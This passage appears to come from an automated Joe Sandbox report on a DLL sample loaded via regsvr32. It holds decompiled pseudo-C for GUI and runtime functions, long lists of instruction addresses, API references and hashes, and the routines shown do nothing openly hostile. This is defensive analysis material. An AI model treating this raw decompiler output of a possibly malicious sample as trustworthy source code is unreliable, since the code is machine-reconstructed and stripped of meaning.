															 *((intOrPtr*)(_t346 + 0x28)) =  *_t271;
															 *((intOrPtr*)(_t346 + 0x2c)) =  *((intOrPtr*)(_t271 + 4));
															 *((char*)(_t346 - 4)) = 0xd;
															E100235DF(_t346 + 0x20, _t346 + 0x3c, _t346 + 0x20);
															_t203 = _t346 + 0x20;
															goto L30;
														} else {
															__eflags = _t270 - 1;
															if(__eflags == 0) {
																 *(_t346 - 0x64) =  *(E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
																 *(_t346 - 0x6c) = 7;
																 *((char*)(_t346 - 4)) = 0xc;
																E100235DF(_t346 - 0x6c, _t346 + 0x3c, _t346 - 0x6c);
																_t203 = _t346 - 0x6c;
																L30:
																 *((char*)(_t346 - 4)) = 0;
																 *_t345(_t203);
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						E10023D97( *((intOrPtr*)(_t346 + 0x4c)), _t346 + 0x3c);
						 *_t345(_t346 + 0x3c);
					}
				} else {
					L4:
					E10023D97( *((intOrPtr*)(_t346 + 0x4c)), _t346 + 0x3c);
					__imp__#9(_t346 + 0x3c);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t346 - 0xc));
				_pop(_t341);
				_pop(_t344);
				_pop(_t281);
				return E1004763E( *((intOrPtr*)(_t346 + 0x4c)), _t281,  *(_t346 + 0x68) ^ _t346, _t337, _t341, _t344);
			}










































                                                                                                                0x10032245
                                                                                                                0x10032245
                                                                                                                0x10032245
                                                                                                                0x10032249
                                                                                                                0x1003224d
                                                                                                                0x10032254
                                                                                                                0x10032257
                                                                                                                0x10032261
                                                                                                                0x1003226b
                                                                                                                0x10032270
                                                                                                                0x10032272
                                                                                                                0x10032275
                                                                                                                0x1003227b
                                                                                                                0x1003227d
                                                                                                                0x1003227f
                                                                                                                0x1003227f
                                                                                                                0x1003227f
                                                                                                                0x1003228e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10032294
                                                                                                                0x1003229e
                                                                                                                0x100322a6
                                                                                                                0x100322a9
                                                                                                                0x100322ac
                                                                                                                0x100322b4
                                                                                                                0x100322d1
                                                                                                                0x100322dd
                                                                                                                0x100322e2
                                                                                                                0x100322e4
                                                                                                                0x00000000
                                                                                                                0x100322e6
                                                                                                                0x100322e6
                                                                                                                0x100322ea
                                                                                                                0x100322f5
                                                                                                                0x100322f7
                                                                                                                0x10032551
                                                                                                                0x10032551
                                                                                                                0x10032556
                                                                                                                0x00000000
                                                                                                                0x1003255c
                                                                                                                0x1003255c
                                                                                                                0x1003255c
                                                                                                                0x1003255d
                                                                                                                0x10032695
                                                                                                                0x1003269a
                                                                                                                0x1003269c
                                                                                                                0x100326a2
                                                                                                                0x100326a5
                                                                                                                0x100326a8
                                                                                                                0x100326aa
                                                                                                                0x100326aa
                                                                                                                0x100326aa
                                                                                                                0x100326aa
                                                                                                                0x100326ad
                                                                                                                0x100326ad
                                                                                                                0x100326aa
                                                                                                                0x100326b5
                                                                                                                0x100326b8
                                                                                                                0x100326ba
                                                                                                                0x100326ba
                                                                                                                0x100326bc
                                                                                                                0x100326bf
                                                                                                                0x100326cc
                                                                                                                0x100326d0
                                                                                                                0x100326d5
                                                                                                                0x00000000
                                                                                                                0x100326d5
                                                                                                                0x10032563
                                                                                                                0x10032564
                                                                                                                0x10032564
                                                                                                                0x10032565
                                                                                                                0x1003263e
                                                                                                                0x10032640
                                                                                                                0x1003264a
                                                                                                                0x10032650
                                                                                                                0x10032653
                                                                                                                0x10032660
                                                                                                                0x10032663
                                                                                                                0x10032668
                                                                                                                0x10032671
                                                                                                                0x1003267b
                                                                                                                0x1003267f
                                                                                                                0x10032684
                                                                                                                0x00000000
                                                                                                                0x10032684
                                                                                                                0x1003256b
                                                                                                                0x1003256b
                                                                                                                0x1003256b
                                                                                                                0x1003256c
                                                                                                                0x100325e0
                                                                                                                0x100325e5
                                                                                                                0x100325e7
                                                                                                                0x100325f1
                                                                                                                0x100325f4
                                                                                                                0x10032604
                                                                                                                0x10032607
                                                                                                                0x1003260c
                                                                                                                0x10032615
                                                                                                                0x1003261f
                                                                                                                0x10032623
                                                                                                                0x10032628
                                                                                                                0x00000000
                                                                                                                0x10032628
                                                                                                                0x1003256e
                                                                                                                0x1003256e
                                                                                                                0x1003256f
                                                                                                                0x1003257e
                                                                                                                0x10032583
                                                                                                                0x10032585
                                                                                                                0x100325af
                                                                                                                0x100325b4
                                                                                                                0x100325bc
                                                                                                                0x100325c6
                                                                                                                0x100325ca
                                                                                                                0x100325cf
                                                                                                                0x00000000
                                                                                                                0x100325cf
                                                                                                                0x10032585
                                                                                                                0x1003256f
                                                                                                                0x1003256c
                                                                                                                0x10032565
                                                                                                                0x1003255d
                                                                                                                0x100322fd
                                                                                                                0x100322fd
                                                                                                                0x1003251a
                                                                                                                0x1003252a
                                                                                                                0x1003252e
                                                                                                                0x10032537
                                                                                                                0x1003253b
                                                                                                                0x10032547
                                                                                                                0x10032549
                                                                                                                0x00000000
                                                                                                                0x10032303
                                                                                                                0x10032303
                                                                                                                0x10032306
                                                                                                                0x100323f5
                                                                                                                0x100323f8
                                                                                                                0x100324f2
                                                                                                                0x100324fb
                                                                                                                0x100324ff
                                                                                                                0x10032504
                                                                                                                0x00000000
                                                                                                                0x100323fe
                                                                                                                0x100323fe
                                                                                                                0x10032401
                                                                                                                0x100324b9
                                                                                                                0x100324c2
                                                                                                                0x100324c6
                                                                                                                0x100324cb
                                                                                                                0x00000000
                                                                                                                0x10032407
                                                                                                                0x10032407
                                                                                                                0x1003240a
                                                                                                                0x10032410
                                                                                                                0x10032413
                                                                                                                0x10032483
                                                                                                                0x1003248a
                                                                                                                0x10032490
                                                                                                                0x1003249a
                                                                                                                0x1003249e
                                                                                                                0x100324a3
                                                                                                                0x00000000
                                                                                                                0x10032415
                                                                                                                0x10032415
                                                                                                                0x10032418
                                                                                                                0x00000000
                                                                                                                0x1003241a
                                                                                                                0x1003241a
                                                                                                                0x1003241d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003241d
                                                                                                                0x10032418
                                                                                                                0x10032413
                                                                                                                0x1003240a
                                                                                                                0x10032401
                                                                                                                0x1003230c
                                                                                                                0x1003230c
                                                                                                                0x100326dd
                                                                                                                0x100326eb
                                                                                                                0x100326fb
                                                                                                                0x100326ff
                                                                                                                0x10032708
                                                                                                                0x1003270c
                                                                                                                0x10032718
                                                                                                                0x1003271a
                                                                                                                0x1003271d
                                                                                                                0x1003271d
                                                                                                                0x10032720
                                                                                                                0x10032723
                                                                                                                0x10032312
                                                                                                                0x10032313
                                                                                                                0x10032313
                                                                                                                0x10032314
                                                                                                                0x1003244e
                                                                                                                0x10032464
                                                                                                                0x1003246d
                                                                                                                0x10032471
                                                                                                                0x10032476
                                                                                                                0x00000000
                                                                                                                0x1003231a
                                                                                                                0x1003231a
                                                                                                                0x1003231a
                                                                                                                0x1003231b
                                                                                                                0x10032423
                                                                                                                0x10032434
                                                                                                                0x1003243d
                                                                                                                0x10032441
                                                                                                                0x10032446
                                                                                                                0x00000000
                                                                                                                0x10032321
                                                                                                                0x10032321
                                                                                                                0x10032321
                                                                                                                0x10032322
                                                                                                                0x100323ce
                                                                                                                0x100323d1
                                                                                                                0x100323da
                                                                                                                0x100323e4
                                                                                                                0x100323e8
                                                                                                                0x100323ed
                                                                                                                0x00000000
                                                                                                                0x10032328
                                                                                                                0x10032328
                                                                                                                0x10032328
                                                                                                                0x10032329
                                                                                                                0x100323a1
                                                                                                                0x100323a4
                                                                                                                0x100323b1
                                                                                                                0x100323b5
                                                                                                                0x100323ba
                                                                                                                0x00000000
                                                                                                                0x1003232b
                                                                                                                0x1003232b
                                                                                                                0x1003232b
                                                                                                                0x1003232c
                                                                                                                0x10032367
                                                                                                                0x10032371
                                                                                                                0x10032377
                                                                                                                0x1003237a
                                                                                                                0x10032384
                                                                                                                0x10032388
                                                                                                                0x1003238d
                                                                                                                0x00000000
                                                                                                                0x1003232e
                                                                                                                0x1003232e
                                                                                                                0x1003232f
                                                                                                                0x10032341
                                                                                                                0x10032344
                                                                                                                0x10032351
                                                                                                                0x10032355
                                                                                                                0x1003235a
                                                                                                                0x100324d1
                                                                                                                0x100324d2
                                                                                                                0x100324d5
                                                                                                                0x100324d5
                                                                                                                0x1003232f
                                                                                                                0x1003232c
                                                                                                                0x10032329
                                                                                                                0x10032322
                                                                                                                0x1003231b
                                                                                                                0x10032314
                                                                                                                0x1003230c
                                                                                                                0x10032306
                                                                                                                0x100322fd
                                                                                                                0x1003272f
                                                                                                                0x10032738
                                                                                                                0x10032738
                                                                                                                0x100322b6
                                                                                                                0x100322b6
                                                                                                                0x100322bd
                                                                                                                0x100322c6
                                                                                                                0x100322c6
                                                                                                                0x10032740
                                                                                                                0x10032748
                                                                                                                0x10032749
                                                                                                                0x1003274a
                                                                                                                0x10032759

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10032261
                                                                                                                • VariantClear.OLEAUT32(?), ref: 100322C6
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                • VariantClear.OLEAUT32(?), ref: 100324D5
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10032547
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10032738
                                                                                                                  • Part of subcall function 100235DF: VariantCopy.OLEAUT32(00000000,00000000), ref: 100235ED
                                                                                                                  • Part of subcall function 1000B543: __EH_prolog3.LIBCMT ref: 1000B54A
                                                                                                                  • Part of subcall function 10025968: __EH_prolog3.LIBCMT ref: 10025972
                                                                                                                  • Part of subcall function 10025968: lstrlenA.KERNEL32(?,?,?,00000224), ref: 10025991
                                                                                                                  • Part of subcall function 10025968: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 10025999
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearH_prolog3$AllocByteCopyException@8StringThrowlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1021156189-0
                                                                                                                • Opcode ID: 41d82c729fe2f8260028a4ca9dc4131b6792d18636b98becd0ca89b7d9f04e1c
                                                                                                                • Instruction ID: a0bcb12857ba3903d996966c8cd61b66d77702176a5ef2efd29989c3a65c1587
                                                                                                                • Opcode Fuzzy Hash: 41d82c729fe2f8260028a4ca9dc4131b6792d18636b98becd0ca89b7d9f04e1c
                                                                                                                • Instruction Fuzzy Hash: 0CF17C3590024CEEDF06DFA0D890AED7BB9FF08341F90805AFC5597252DB74AA88DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10044419 Relevance: 9.3, APIs: 6, Instructions: 326COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 10043D2F: PeekMessageA.USER32(00000000,00000000,0000000F,0000000F,00000000), ref: 10043D70
                                                                                                                  • Part of subcall function 10043D2F: SetRectEmpty.USER32(?), ref: 10043D94
                                                                                                                  • Part of subcall function 10043D2F: GetDesktopWindow.USER32 ref: 10043DAC
                                                                                                                  • Part of subcall function 10043D2F: LockWindowUpdate.USER32(?), ref: 10043DBD
                                                                                                                  • Part of subcall function 10043D2F: GetDCEx.USER32 ref: 10043DD4
                                                                                                                  • Part of subcall function 1000C15D: GetModuleHandleA.KERNEL32(GDI32.DLL,?,10044440), ref: 1000C165
                                                                                                                  • Part of subcall function 1000C15D: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 1000C171
                                                                                                                • GetWindowRect.USER32 ref: 10044466
                                                                                                                  • Part of subcall function 1000C193: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,1004444D,00000000), ref: 1000C19C
                                                                                                                  • Part of subcall function 1000C193: GetProcAddress.KERNEL32(00000000,SetLayout,?,?,1004444D,00000000), ref: 1000C1AA
                                                                                                                • InflateRect.USER32 ref: 10044558
                                                                                                                • InflateRect.USER32 ref: 100446FE
                                                                                                                  • Part of subcall function 10043B94: OffsetRect.USER32 ref: 10043BCB
                                                                                                                  • Part of subcall function 10043F4D: OffsetRect.USER32 ref: 10043F76
                                                                                                                  • Part of subcall function 10043F4D: OffsetRect.USER32 ref: 10043F80
                                                                                                                  • Part of subcall function 10043F4D: OffsetRect.USER32 ref: 10043F8A
                                                                                                                  • Part of subcall function 10043F4D: OffsetRect.USER32 ref: 10043F94
                                                                                                                  • Part of subcall function 100442FE: GetCapture.USER32 ref: 1004430F
                                                                                                                  • Part of subcall function 100442FE: SetCapture.USER32(?), ref: 1004431F
                                                                                                                  • Part of subcall function 100442FE: GetCapture.USER32 ref: 1004432B
                                                                                                                  • Part of subcall function 100442FE: GetMessageA.USER32 ref: 10044345
                                                                                                                  • Part of subcall function 100442FE: DispatchMessageA.USER32 ref: 10044377
                                                                                                                  • Part of subcall function 100442FE: GetCapture.USER32 ref: 100443D5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Offset$Capture$MessageWindow$AddressHandleInflateModuleProc$DesktopDispatchEmptyLockPeekUpdate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1062258019-0
                                                                                                                • Opcode ID: 67f520f56967a2ed91aaeee5dd87e8751fe0b00d6e60048abf72591966aa5ee6
                                                                                                                • Instruction ID: 033dee92a02667b33d4f71786534c4978ee569dc66ecec565995e3ee7b1f86bc
                                                                                                                • Opcode Fuzzy Hash: 67f520f56967a2ed91aaeee5dd87e8751fe0b00d6e60048abf72591966aa5ee6
                                                                                                                • Instruction Fuzzy Hash: 43B16D75900619EFDF01DFA4C881EEE7BBAEF4A310F114194FD05AB255DA71AD44CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10043FFD Relevance: 9.1, APIs: 6, Instructions: 144COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E10043FFD(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _t81;
				int _t83;
				int _t90;
				intOrPtr _t92;
				intOrPtr _t111;
				int _t125;
				void* _t134;
				void* _t139;
				intOrPtr _t143;
				void* _t145;
				void* _t149;

				_t145 = __edi;
				_t134 = __ecx;
				_t81 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t139 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_t143 =  *((intOrPtr*)(__ecx + 0x8c));
				_t149 = 2;
				if(_t143 == 0xa) {
					L7:
					 *((intOrPtr*)(_t134 + 0x28)) =  *((intOrPtr*)(_t134 + 0x28)) + _t81;
					L9:
					_t83 =  *((intOrPtr*)(_t134 + 0x30)) -  *((intOrPtr*)(_t134 + 0x28));
					__eflags = _t83;
					L10:
					if(_t83 < 0) {
						_t83 = 0;
					}
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x68)))) + 0x138))( &_v12, _t83, _t149, _t145);
					_v44.left = GetSystemMetrics(0x4c);
					_v44.top = GetSystemMetrics(0x4d);
					_v44.right = GetSystemMetrics(0x4e) + _v44.left;
					_t90 = GetSystemMetrics(0x4f);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v44.bottom = _t90 + _v44.top;
					_t92 =  *((intOrPtr*)(_t134 + 0x8c));
					asm("movsd");
					if(_t92 == 0xa || _t92 == 0xc) {
						_v28.left =  *((intOrPtr*)(_t134 + 0x58)) -  *((intOrPtr*)(_t134 + 0x60)) - _v12 + _v28.right;
						_v28.top =  *((intOrPtr*)(_t134 + 0x5c)) -  *((intOrPtr*)(_t134 + 0x64)) - _v8 + _v28.bottom;
						__eflags = IntersectRect( &_v60,  &_v44,  &_v28);
						if(__eflags != 0) {
							 *((intOrPtr*)(_t134 + 0x38)) =  *((intOrPtr*)(_t134 + 0x40)) - _v12;
							_t111 =  *((intOrPtr*)(_t134 + 0x44)) - _v8;
							__eflags = _t111;
							 *((intOrPtr*)(_t134 + 0x3c)) = _t111;
							 *(_t134 + 0x48) = _v28.left;
							 *((intOrPtr*)(_t134 + 0x4c)) = _v28.top;
						}
					} else {
						_v28.right =  *((intOrPtr*)(_t134 + 0x60)) -  *((intOrPtr*)(_t134 + 0x58)) + _v28.left + _v12;
						_v28.bottom =  *((intOrPtr*)(_t134 + 0x64)) -  *((intOrPtr*)(_t134 + 0x5c)) + _v28.top + _v8;
						_t125 = IntersectRect( &_v60,  &_v44,  &_v28);
						_t162 = _t125;
						if(_t125 != 0) {
							 *((intOrPtr*)(_t134 + 0x40)) =  *((intOrPtr*)(_t134 + 0x38)) + _v12;
							 *((intOrPtr*)(_t134 + 0x44)) =  *((intOrPtr*)(_t134 + 0x3c)) + _v8;
							 *((intOrPtr*)(_t134 + 0x50)) = _v28.right;
							 *((intOrPtr*)(_t134 + 0x54)) = _v28.bottom;
						}
					}
					 *((intOrPtr*)(_t134 + 4)) = _a4;
					 *((intOrPtr*)(_t134 + 8)) = _a8;
					return E10043DEE(_t134, _t162, 0);
				}
				if(_t143 == 0xb) {
					__eflags = _t143 - 0xa;
					if(_t143 != 0xa) {
						_t14 = __ecx + 0x30;
						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t81;
						__eflags =  *_t14;
						goto L9;
					}
					goto L7;
				} else {
					_t149 = 0x22;
					if(_t143 != 0xc) {
						_t8 = __ecx + 0x34;
						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t139;
						__eflags =  *_t8;
					} else {
						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t139;
					}
					_t83 =  *((intOrPtr*)(_t134 + 0x34)) -  *((intOrPtr*)(_t134 + 0x2c));
					goto L10;
				}
			}



















                                                                                                                0x10043ffd
                                                                                                                0x10044007
                                                                                                                0x1004400f
                                                                                                                0x10044015
                                                                                                                0x10044017
                                                                                                                0x10044022
                                                                                                                0x10044023
                                                                                                                0x10044047
                                                                                                                0x10044047
                                                                                                                0x1004404f
                                                                                                                0x10044052
                                                                                                                0x10044052
                                                                                                                0x10044055
                                                                                                                0x10044057
                                                                                                                0x10044059
                                                                                                                0x10044059
                                                                                                                0x10044067
                                                                                                                0x10044079
                                                                                                                0x10044080
                                                                                                                0x1004408a
                                                                                                                0x1004408d
                                                                                                                0x10044098
                                                                                                                0x10044099
                                                                                                                0x1004409a
                                                                                                                0x1004409b
                                                                                                                0x1004409e
                                                                                                                0x100440a7
                                                                                                                0x100440a9
                                                                                                                0x10044110
                                                                                                                0x1004411f
                                                                                                                0x10044134
                                                                                                                0x10044136
                                                                                                                0x1004413e
                                                                                                                0x10044144
                                                                                                                0x10044144
                                                                                                                0x10044147
                                                                                                                0x1004414d
                                                                                                                0x10044153
                                                                                                                0x10044153
                                                                                                                0x100440b0
                                                                                                                0x100440bc
                                                                                                                0x100440cb
                                                                                                                0x100440da
                                                                                                                0x100440e0
                                                                                                                0x100440e2
                                                                                                                0x100440ea
                                                                                                                0x100440f3
                                                                                                                0x100440f9
                                                                                                                0x100440ff
                                                                                                                0x100440ff
                                                                                                                0x100440e2
                                                                                                                0x10044159
                                                                                                                0x10044163
                                                                                                                0x1004416e
                                                                                                                0x1004416e
                                                                                                                0x10044028
                                                                                                                0x10044042
                                                                                                                0x10044045
                                                                                                                0x1004404c
                                                                                                                0x1004404c
                                                                                                                0x1004404c
                                                                                                                0x00000000
                                                                                                                0x1004404c
                                                                                                                0x00000000
                                                                                                                0x1004402a
                                                                                                                0x1004402f
                                                                                                                0x10044030
                                                                                                                0x10044037
                                                                                                                0x10044037
                                                                                                                0x10044037
                                                                                                                0x10044032
                                                                                                                0x10044032
                                                                                                                0x10044032
                                                                                                                0x1004403d
                                                                                                                0x00000000
                                                                                                                0x1004403d

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem$IntersectRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 1124862357-0
                                                                                                                • Opcode ID: 3b0aa6f9faa56136fe567557d11243fb8cf2b5c990d1912d651e0cfb982aeed5
                                                                                                                • Instruction ID: 917d11f897bfa57f403c9ec645025f4c5d4c3deac5c3f87a3aea9b27b5094f21
                                                                                                                • Opcode Fuzzy Hash: 3b0aa6f9faa56136fe567557d11243fb8cf2b5c990d1912d651e0cfb982aeed5
                                                                                                                • Instruction Fuzzy Hash: 91516672A00209DFCF54DFA8C5C5A9E7BF5FF08350F1545A5EA09EB24AE634E980CB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003E699 Relevance: 9.1, APIs: 6, Instructions: 126windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 63%
                                                                                                                			E1003E699(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v17;
				char _v18;
				signed int _v19;
				char _v28;
				long _v32;
				signed int _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t43;
				signed int _t50;
				signed char _t57;
				void* _t68;
				void* _t86;
				intOrPtr* _t87;
				intOrPtr* _t88;
				signed int _t89;

				_t86 = __edx;
				_t43 =  *0x100b9e70; // 0xbb35530
				_v8 = _t43 ^ _t89;
				_t87 = _a8;
				_t88 = __ecx;
				_push( &_v28);
				_push(_a4);
				_push(0x417);
				 *((intOrPtr*)( *__ecx + 0x110))();
				 *(_t87 + 8) =  *(_t87 + 8) ^ 0x00000004;
				_v18 = 0;
				_v17 = 0;
				 *((char*)(_t87 + 0xa)) = 0;
				 *((char*)(_t87 + 0xb)) = 0;
				if(E1004A7B7(_t87,  &_v28, 0x14) != 0) {
					_t50 = E100177F8(_t88);
					_t69 = _t50;
					_v36 = _t50;
					E1001782C(_t88, 0x10000000, 0, 0);
					 *((intOrPtr*)( *_t88 + 0x110))(0x416, _a4, 0, _t68);
					if( *((intOrPtr*)(_t87 + 0x10)) < 0xffffffff) {
						_v32 = SendMessageA( *(_t88 + 0x20), 0x43d, 0, 0);
						SendMessageA( *(_t88 + 0x20), 0xb, 0, 0);
						SendMessageA( *(_t88 + 0x20), 0x43c, _v32 + 1, 0);
						SendMessageA( *(_t88 + 0x20), 0x43c, _v32, 0);
						SendMessageA( *(_t88 + 0x20), 0xb, 1, 0);
						 *((intOrPtr*)(_t87 + 0x10)) =  *((intOrPtr*)(_t87 + 0x10)) + 0xf4240;
						_t69 = _v36;
					}
					 *((intOrPtr*)( *_t88 + 0x110))(_a4, _t87);
					E1001782C(_t88, 0, _t69 & 0x10000000, 0);
					_t57 =  *((intOrPtr*)(_t87 + 9));
					_t68 = 0x415;
					if(((_t57 ^ _v19) & 0x00000001) != 0 || (_t57 & 0x00000001) != 0 &&  *_t87 != _v28) {
						_push(1);
						_push(0);
						goto L9;
					} else {
						_push( &_v52);
						_push(_a4);
						_push(0x41d);
						if( *((intOrPtr*)( *_t88 + 0x110))() != 0) {
							_push(1);
							_push( &_v52);
							L9:
							_t48 = InvalidateRect( *(_t88 + 0x20), ??, ??);
						}
					}
				}
				return E1004763E(_t48, _t68, _v8 ^ _t89, _t86, _t87, _t88);
			}






















                                                                                                                0x1003e699
                                                                                                                0x1003e69f
                                                                                                                0x1003e6a6
                                                                                                                0x1003e6ab
                                                                                                                0x1003e6ae
                                                                                                                0x1003e6b5
                                                                                                                0x1003e6b6
                                                                                                                0x1003e6bb
                                                                                                                0x1003e6c0
                                                                                                                0x1003e6c6
                                                                                                                0x1003e6d1
                                                                                                                0x1003e6d5
                                                                                                                0x1003e6d9
                                                                                                                0x1003e6dd
                                                                                                                0x1003e6eb
                                                                                                                0x1003e6f4
                                                                                                                0x1003e6fd
                                                                                                                0x1003e706
                                                                                                                0x1003e709
                                                                                                                0x1003e71c
                                                                                                                0x1003e726
                                                                                                                0x1003e745
                                                                                                                0x1003e748
                                                                                                                0x1003e759
                                                                                                                0x1003e768
                                                                                                                0x1003e773
                                                                                                                0x1003e775
                                                                                                                0x1003e77c
                                                                                                                0x1003e77c
                                                                                                                0x1003e78c
                                                                                                                0x1003e79f
                                                                                                                0x1003e7a4
                                                                                                                0x1003e7ac
                                                                                                                0x1003e7b0
                                                                                                                0x1003e7df
                                                                                                                0x1003e7e1
                                                                                                                0x00000000
                                                                                                                0x1003e7bd
                                                                                                                0x1003e7c2
                                                                                                                0x1003e7c3
                                                                                                                0x1003e7c8
                                                                                                                0x1003e7d5
                                                                                                                0x1003e7d7
                                                                                                                0x1003e7dc
                                                                                                                0x1003e7e3
                                                                                                                0x1003e7e6
                                                                                                                0x1003e7e6
                                                                                                                0x1003e7d5
                                                                                                                0x1003e7b0
                                                                                                                0x1003e7f9

                                                                                                                APIs
                                                                                                                  • Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803
                                                                                                                • SendMessageA.USER32 ref: 1003E73A
                                                                                                                • SendMessageA.USER32 ref: 1003E748
                                                                                                                • SendMessageA.USER32 ref: 1003E759
                                                                                                                • SendMessageA.USER32 ref: 1003E768
                                                                                                                • SendMessageA.USER32 ref: 1003E773
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 1003E7E6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
